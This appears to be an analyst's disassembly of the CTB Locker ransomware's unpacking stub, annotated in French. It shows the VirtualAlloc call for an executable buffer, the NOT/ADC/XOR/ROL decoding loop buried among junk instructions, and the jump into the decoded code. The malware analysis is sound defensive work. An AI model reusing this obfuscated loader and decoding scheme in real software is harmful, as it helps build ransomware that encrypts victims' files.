.text:004028D6 DecodageProc:                           ; CODE XREF: .text:00401483
.text:004028D6                                         ; DATA XREF: .text:00402E11
.text:004028D6                                         : Routine de décodage du vrai code du malware CTB Locker
.text:004028D6                 xor     edx, edx
.text:004028D8                 sub     edx, offset unk_4055B7 ; EDX = début zone à décoder
.text:004028DE                 neg     edx
.text:004028E0                 sub     edi, edi
.text:004028E2                 xor     edi, 674h
.text:004028E8                 mov     ecx, 37497531h  ;
.text:004028E8                                         ; ========== VirtualAlloc ( NULL, 0x674, MEM_COMMIT, PAGE_EXECUTE_READWRITE); ==========
.text:004028ED                 push    ecx             ; On sauve ECX et EDX via la pile
.text:004028EE                 push    edx
.text:004028EF                 mov     ebx, 5F88252Bh
.text:004028F4                 sub     ebx, 5F8824EBh
.text:004028FA                 push    ebx             ; EBX = 0x40, soit flProtect = PAGE_EXECUTE_READWRITE
.text:004028FB                 mov     ebx, 5F8834EBh
.text:00402900                 sub     ebx, 5F8824EBh
.text:00402906                 push    ebx             ; EBX = 0x1000, soit flAllocationType = MEM_COMMIT
.text:00402907                 mov     ebx, 5F882B5Fh
.text:0040290C                 sub     ebx, 5F8824EBh
.text:00402912                 push    ebx             ; EBX = 0x674, soit dwSize = 0x674
.text:00402913                 mov     edx, 0
.text:00402918                 push    edx             ; lpAdress = NULL, on laisse le systeme prendre la mémoire où il veut
.text:00402919                 call    ds:VirtualAlloc
.text:0040291F                 pop     edx             ; On récupère EDX et ECX sauvés plus haut
.text:00402920                 pop     ecx             ; ECX = 0x37497531
.text:00402921                 test    eax, eax
.text:00402923                 jz      endProc         ; Si l'allocation n'a pas marché, on s'en va...
.text:00402929                 lea     ebx, [eax]      ; Sinon, EBX pointe sur les pages allouées
.text:0040292B                 push    ebx             ; On empile EBX pour pouvoir ensuite à la fin du décodage exécuter le code décodé
.text:0040292C
.text:0040292C loc_40292C:                             ; CODE XREF: .text:00402DAE
.text:0040292C                 mov     byte ptr dword_4070DD, 7Dh
.text:00402933                 sbb     dword ptr byte_407127, esi
.text:00402939                 mov     esi, dword ptr unk_40703E
.text:0040293F                 mov     byte ptr dword_40716B, 1Bh
.text:00402946                 mov     esi, dword_407142+2
.text:0040294C                 sbb     esi, esi        ; ESI = ESI+CF-ESI
.text:0040294E                 sbb     dword_40705A+1, esi
.text:00402954                 sbb     dword ptr unk_4070A0, esi
.text:0040295A                 mov     esi, dword_40716B+2
.text:00402960                 mov     byte ptr dword_40712A, 89h
.text:00402967                 sbb     esi, esi
.text:00402969                 add     dword_4070FD+2, esi
.text:0040296F                 sub     dword_407076+1, esi
.text:00402975                 mov     byte_40709C, 0B6h
.text:0040297C                 mov     esi, dword ptr unk_4070A6
.text:00402982                 adc     esi, 0FFFFFFAAh
.text:00402985                 mov     esi, dword_407174+1
.text:0040298B                 xor     eax, eax        ; EAX = 0
.text:0040298D                 xor     eax, [edx]      ; On charge EAX avec 4 octets pointés par EDX
.text:0040298F                 mov     byte ptr dword_4070FD, 40h
.text:00402996                 adc     dword ptr byte_4070E8, esi
.text:0040299C                 mov     byte ptr dword_40706A+1, 0DAh
.text:004029A3                 or      dword_4070C7, esi
.text:004029A9                 add     dword ptr unk_40712E, esi
.text:004029AF                 add     esi, esi
.text:004029B1                 add     esi, esi
.text:004029B3                 mov     byte ptr dword_407158, 11h
.text:004029BA                 sbb     dword ptr unk_4071A6, esi
.text:004029C0                 and     esi, 0FFFFFFA3h
.text:004029C3                 sbb     dword_407055, esi
.text:004029C9                 add     esi, esi
.text:004029CB                 sbb     esi, esi
.text:004029CD                 and     dword_40710A+1, esi
.text:004029D3                 sub     esi, 5Ch
.text:004029D6                 adc     dword_407166+3, esi
.text:004029DC                 adc     dword ptr byte_407017, esi
.text:004029E2                 mov     esi, dword_40716B+2
.text:004029E8                 lea     edx, [edx+4]                                         ; On avance EDX pour les 4 octets suivants à la prochaine boucle
.text:004029EB                 or      esi, 21h
.text:004029EE                 mov     byte ptr dword_40718D+1, 0B3h
.text:004029F5                 mov     byte ptr dword_407130+2, 0A6h
.text:004029FC                 mov     byte_4071A8, 0B0h
.text:00402A03                 add     dword_40706A+3, esi
.text:00402A09                 and     esi, 3Ch
.text:00402A0C                 mov     dword_407076, esi
.text:00402A12                 mov     esi, dword_407086+2
.text:00402A18                 mov     byte_407101, 69h
.text:00402A1F                 or      esi, 0FFFFFF86h
.text:00402A22                 or      esi, 0FFFFFFDAh
.text:00402A25                 mov     esi, dword_407000
.text:00402A2B                 sbb     esi, esi
.text:00402A2D                 add     esi, esi
.text:00402A2F                 adc     dword_407051, esi
.text:00402A35                 not     eax                                                   ; Traitement 1 : NOT EAX
.text:00402A37                 mov     esi, dword_40701E
.text:00402A3D                 mov     dword_407035+1, esi
.text:00402A43                 mov     esi, dword_407170
.text:00402A49                 mov     esi, dword_407091
.text:00402A4F                 mov     byte ptr unk_4071C1, 98h
.text:00402A56                 sbb     esi, 0FFFFFFF8h
.text:00402A59                 sbb     esi, 0FFFFFFE3h
.text:00402A5C                 mov     esi, dword_40716B+2
.text:00402A62                 add     esi, esi
.text:00402A64                 mov     byte ptr dword_407170+1, 9Dh
.text:00402A6B                 and     esi, 0FFFFFFCEh
.text:00402A6E                 sub     esi, esi
.text:00402A70                 or      esi, 73h
.text:00402A73                 add     esi, esi
.text:00402A75                 mov     esi, dword ptr byte_4071CB
.text:00402A7B                 clc
.text:00402A7C                 adc     eax, 0FFFFFFE7h                                        ; Traitement 2 : ADC EAX,0FFFFFFE7h
.text:00402A7F                 mov     esi, dword_40705A+2
.text:00402A85                 adc     dword ptr byte_407181, esi
.text:00402A8B                 mov     esi, dword_407142
.text:00402A91                 mov     byte ptr dword_407166, 5Ch
.text:00402A98                 mov     byte_4070F3, 1Eh
.text:00402A9F                 add     esi, esi
.text:00402AA1                 sub     esi, 7Ch
.text:00402AA4                 mov     esi, dword_4070D7+2
.text:00402AAA                 sub     esi, esi
.text:00402AAC                 mov     byte ptr dword_4070B7+3, 0C5h
.text:00402AB3                 or      esi, 1Ch
.text:00402AB6                 adc     esi, esi
.text:00402AB8                 mov     byte ptr unk_4071E7, 0ABh
.text:00402ABF                 mov     esi, dword ptr byte_40709D
.text:00402AC5                 sbb     dword_407005+3, esi
.text:00402ACB                 mov     esi, dword ptr unk_407068
.text:00402AD1                 mov     esi, dword_4071D5+1
.text:00402AD7                 xor     dword ptr unk_4071DF, esi
.text:00402ADD                 mov     esi, dword_407105+2
.text:00402AE3                 xor     eax, ecx                                               ; Traitement 3 : XOR EAX,ECX
.text:00402AE5                 xor     esi, 0FFFFFFDBh
.text:00402AE8                 mov     esi, dword_407051+3
.text:00402AEE                 add     esi, 8
.text:00402AF1                 add     esi, 7
.text:00402AF4                 mov     esi, dword_40704C+2
.text:00402AFA                 add     esi, esi
.text:00402AFC                 mov     byte ptr dword_4070A1, 87h
.text:00402B03                 mov     esi, dword_40710A+3
.text:00402B09                 adc     esi, esi
.text:00402B0B                 sbb     esi, esi
.text:00402B0D                 mov     esi, dword_407055
.text:00402B13                 xor     esi, 70h
.text:00402B16                 mov     byte ptr dword_40706A, 48h
.text:00402B1D                 mov     byte ptr dword_4070AC+3, 9Ch
.text:00402B24                 mov     dword_407188+1, esi
.text:00402B2A                 mov     esi, dword_40713E+2
.text:00402B30                 and     esi, 31h
.text:00402B33                 xor     esi, 3Dh
.text:00402B36                 sbb     dword ptr unk_407156, esi
.text:00402B3C                 or      dword ptr byte_407101, esi
.text:00402B42                 inc     eax                                                    ; Traitement 4 : INC EAX
.text:00402B43                 mov     byte_4070E6, 9
.text:00402B4A                 xor     esi, esi
.text:00402B4C                 add     esi, esi
.text:00402B4E                 or      esi, 1Ch
.text:00402B51                 and     esi, 0FFFFFFC2h
.text:00402B54                 adc     esi, esi
.text:00402B56                 mov     byte ptr dword_40702D+1, 76h
.text:00402B5D                 mov     esi, dword ptr byte_4070CF
.text:00402B63                 mov     byte ptr dword_4071FB, 79h
.text:00402B6A                 mov     byte ptr unk_4070B0, 60h
.text:00402B71                 or      dword ptr unk_4071F0, esi
.text:00402B77                 mov     byte_407182, 19h
.text:00402B7E                 sbb     dword ptr unk_4071F8, esi
.text:00402B84                 add     esi, 47h
.text:00402B87                 sbb     esi, esi
.text:00402B89                 mov     byte ptr dword_407134+3, 0E8h
.text:00402B90                 mov     byte ptr dword_40719E, 85h
.text:00402B97                 push    eax                                                    ; On colle EAX dans ECX pour changer la clé de codage pour les 4 prochains octets
.text:00402B98                 pop     ecx
.text:00402B99                 sub     esi, 0FFFFFFCCh
.text:00402B9C                 mov     byte ptr dword_407080+1, 9
.text:00402BA3                 mov     esi, dword_40704C+3
.text:00402BA9                 mov     esi, dword ptr byte_4070F2
.text:00402BAF                 mov     dword_4070AC+2, esi
.text:00402BB5                 adc     dword ptr byte_4070F1, esi
.text:00402BBB                 add     esi, esi
.text:00402BBD                 mov     esi, dword_407138+1
.text:00402BC3                 mov     esi, dword_4071B3+3
.text:00402BC9                 mov     byte_4070C2, 45h
.text:00402BD0                 sbb     dword_407063+3, esi
.text:00402BD6                 add     esi, esi
.text:00402BD8                 mov     esi, dword_4071C7+3
.text:00402BDE                 xor     esi, esi
.text:00402BE0                 and     dword ptr unk_407067, esi
.text:00402BE6                 add     dword ptr byte_40709F, esi
.text:00402BEC                 or      dword_40719A+2, esi
.text:00402BF2                 rol     ecx, 1                                                 ; On décale ECX d'un bit à gauche... 
.text:00402BF4                 xor     esi, esi
.text:00402BF6                 or      esi, 0FFFFFF85h
.text:00402BF9                 xor     esi, 0FFFFFFF2h
.text:00402BFC                 add     esi, esi
.text:00402BFE                 or      dword ptr byte_4071A8, esi
.text:00402C04                 mov     esi, dword ptr unk_4071E4
.text:00402C0A                 and     dword ptr unk_4071ED, esi
.text:00402C10                 and     esi, 48h
.text:00402C13                 add     esi, esi
.text:00402C15                 mov     esi, dword_4070A7+1
.text:00402C1B                 adc     esi, 0FFFFFFB1h
.text:00402C1E                 mov     byte ptr dword_40717A, 25h
.text:00402C25                 mov     byte ptr dword_4071FB, 3Ah
.text:00402C2C                 sub     dword ptr byte_40703F, esi
.text:00402C32                 mov     byte_407059, 85h
.text:00402C39                 or      esi, 0FFFFFFDAh
.text:00402C3C                 sbb     esi, 0FFFFFFC8h
.text:00402C3F                 or      dword_407170+1, esi
.text:00402C45                 mov     byte ptr dword_4071D5+1, 29h
.text:00402C4C                 rol     ecx, 7                                                 ; ...puis de 7 bits supplémentaires.
.text:00402C4F                 sbb     esi, 3Fh
.text:00402C52                 adc     esi, esi
.text:00402C54                 add     esi, esi
.text:00402C56                 adc     esi, esi
.text:00402C58                 xor     esi, esi
.text:00402C5A                 mov     esi, dword_407055+1
.text:00402C60                 mov     byte ptr unk_407015, 93h
.text:00402C67                 mov     byte ptr dword_407184+3, 62h
.text:00402C6E                 mov     byte_407199, 0E2h
.text:00402C75                 mov     esi, dword ptr unk_40713C
.text:00402C7B                 sbb     esi, esi
.text:00402C7D                 xor     esi, 0FFFFFF90h
.text:00402C80                 mov     byte ptr dword_40716B+3, 4Ch
.text:00402C87                 mov     esi, dword_407134+1
.text:00402C8D                 mov     byte_40702A, 0F7h
.text:00402C94                 mov     esi, dword_407174+3
.text:00402C9A                 sub     esi, 0FFFFFFF0h
.text:00402C9D                 mov     esi, dword ptr unk_40711B
.text:00402CA3                 mov     [ebx], eax                                              ; On écrit les 4 octets décodés dans le buffer alloué plus haut
.text:00402CA5                 or      esi, 0FFFFFFBEh
.text:00402CA8                 sub     esi, esi
.text:00402CAA                 xor     esi, 61h
.text:00402CAD                 add     esi, 71h
.text:00402CB0                 mov     esi, dword_407035+1
.text:00402CB6                 add     dword_40705A+1, esi
.text:00402CBC                 or      dword_40702D+3, esi
.text:00402CC2                 mov     byte ptr unk_4070FB, 0C5h
.text:00402CC9                 mov     esi, dword_407113
.text:00402CCF                 mov     byte ptr dword_4071A2+1, 68h
.text:00402CD6                 mov     esi, dword_407149+1
.text:00402CDC                 add     esi, esi
.text:00402CDE                 add     esi, 0FFFFFF84h
.text:00402CE1                 adc     esi, esi
.text:00402CE3                 add     esi, 5Dh
.text:00402CE6                 mov     esi, dword_4071C7
.text:00402CEC                 mov     esi, dword_40707B
.text:00402CF2                 add     dword_4071DA+3, esi
.text:00402CF8                 sub     ebx, 0FFFFFFFCh
.text:00402CFB                 xor     dword_407158, esi
.text:00402D01                 mov     byte_4071D2, 0CAh
.text:00402D08                 sbb     esi, esi
.text:00402D0A                 or      dword ptr byte_407042, esi
.text:00402D10                 adc     esi, 0FFFFFFABh
.text:00402D13                 mov     byte_40707A, 0F2h
.text:00402D1A                 mov     esi, dword_407117+1
.text:00402D20                 mov     esi, dword ptr byte_4071F6
.text:00402D26                 add     dword_40708D, esi
.text:00402D2C                 mov     esi, dword_4071B3
.text:00402D32                 mov     byte_4071CD, 0CFh
.text:00402D39                 mov     byte_407085, 95h
.text:00402D40                 add     esi, esi
.text:00402D42                 add     esi, 65h
.text:00402D45                 add     esi, esi
.text:00402D47                 mov     esi, dword_4071BD+2
.text:00402D4D                 add     edi, 0FFFFFFFCh
.text:00402D50                 mov     byte_4071CB, 6Eh
.text:00402D57                 mov     byte ptr dword_4071DA, 2Ch
.text:00402D5E                 sbb     esi, 5Eh
.text:00402D61                 xor     esi, esi
.text:00402D63                 mov     byte ptr dword_40712A+2, 6Ah
.text:00402D6A                 mov     esi, dword_40706E+3
.text:00402D70                 xor     esi, esi
.text:00402D72                 sbb     esi, 0FFFFFFA1h
.text:00402D75                 mov     esi, dword_407194+3
.text:00402D7B                 mov     esi, dword_4070E2+3
.text:00402D81                 mov     esi, dword_40707B+3
.text:00402D87                 mov     esi, dword ptr unk_407153
.text:00402D8D                 sbb     esi, esi
.text:00402D8F                 mov     byte ptr dword_407035, 0E7h
.text:00402D96                 mov     esi, dword_4071AF+3
.text:00402D9C                 add     esi, esi
.text:00402D9E                 mov     byte ptr dword_407142+3, 5
.text:00402DA5                 mov     esi, dword_407000+2
.text:00402DAB                 cmp     edi, 0
.text:00402DAE                 <jnz     loc_40292C      ; ===> On retourne au début de la routine de décodage
.text:00402DAE                                         ;
.text:00402DB4                 mov     ebx, esp        ; On met ESP dans EBX. ESP pointe à ce moment là sur l'adresse du bloc alloué avant le décodage.
.text:00402DB4                                         ; Plus bas on ira exécuter le code décodé en sautant sur ce bloc.
.text:00402DB6                 mov     ecx, ds:GetModuleHandleA
.text:00402DBC                 push    ecx
.text:00402DBD                 add     eax, edi        ; Quand on est arrivé là, EDI=0...
.text:00402DBF                 xor     edx, ecx
.text:00402DC1                 adc     esi, esi
.text:00402DC3                 mov     dl, byte ptr dword_4070F6+2
.text:00402DC9                 xor     edx, 0FFFFFFA7h
.text:00402DCC                 and     dword_40712A+3, esi
.text:00402DD2                 sbb     byte_407069, dl
.text:00402DD8                 or      ch, 0B6h
.text:00402DDB                 mov     byte_4070F4, 8Dh
.text:00402DE2                 sbb     edi, edx
.text:00402DE4                 and     esi, 4Fh
.text:00402DE7                 add     edi, esi
.text:00402DE9                 mov     esi, dword_4070BB+2
.text:00402DEF                 mov     byte ptr dword_407188+2, 4Fh
.text:00402DF6                 mov     ah, byte ptr dword_407162+2
.text:00402DFC                 mov     esi, dword_407055+3
.text:00402E02                 mov     byte_407180, 69h
.text:00402E09                 sbb     dword ptr byte_4071D9, ecx
.text:00402E0F                 sub     esi, esi
.text:00402E11                 push    offset DecodageProc ; loc_4028D6 = routine de décodage avec allocation de buffer
.text:00402E11                                             ; ...on dirait qu'on prépare un retour pour un deuxième passage décodage+exécution après le premier (à voir plus tard) ???
.text:00402E16                 add     edx, edx
.text:00402E18                 mov     eax, dword_40717A+1
.text:00402E1D                 mov     byte ptr dword_4071DA, 0FBh
.text:00402E24                 sbb     dword_40701E, edx
.text:00402E2A                 add     esi, edi
.text:00402E2C                 sbb     eax, 2Ch
.text:00402E2F                 xor     edi, 0FFFFFFF5h
.text:00402E32                 xor     dword ptr unk_40718C, esi
.text:00402E38                 sbb     dword_40710A, edi
.text:00402E3E                 sub     byte ptr unk_407121, ch
.text:00402E44                 mov     edi, dword_4070A7+1
.text:00402E4A                 mov     edx, dword_40710A+1
.text:00402E50                 mov     edi, dword ptr unk_407112
.text:00402E56                 mov     byte_4070B6, 0FDh
.text:00402E5D                 add     edx, 0FFFFFFBDh
.text:00402E60                 mov     byte ptr dword_4071BD+1, 27h
.text:00402E67                 mov     edx, dword_4071AF
.text:00402E6D                 jmp     dword ptr [ebx]     ; ==> On exécute le code décodé dans le buffer alloué au début...